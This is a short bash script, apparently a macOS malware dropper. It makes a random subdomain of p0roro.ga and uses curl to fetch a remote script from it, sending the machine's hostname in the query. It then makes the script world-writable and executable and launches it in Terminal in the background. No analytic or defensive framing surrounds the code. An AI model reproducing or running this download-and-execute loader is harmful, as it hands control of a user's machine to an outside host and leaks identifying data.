| #!/bin/bash

| WORKDIR="${TMPDIR}p0roro"
| ENDPOINT=http://$(cat /dev/urandom | LC_ALL=C tr -dc 'a-zA-Z0-9' | fold -w 20 | head -n 1).p0roro.ga
| SCRIPT="${WORKDIR}/script.sh"

| rm -rf $WORKDIR
| mkdir -p $WORKDIR

| curl -s $ENDPOINT/scripting?q=#{hostname} --output $SCRIPT > /dev/null; chmod 777 $SCRIPT; open -b com.apple.terminal $SCRIPT &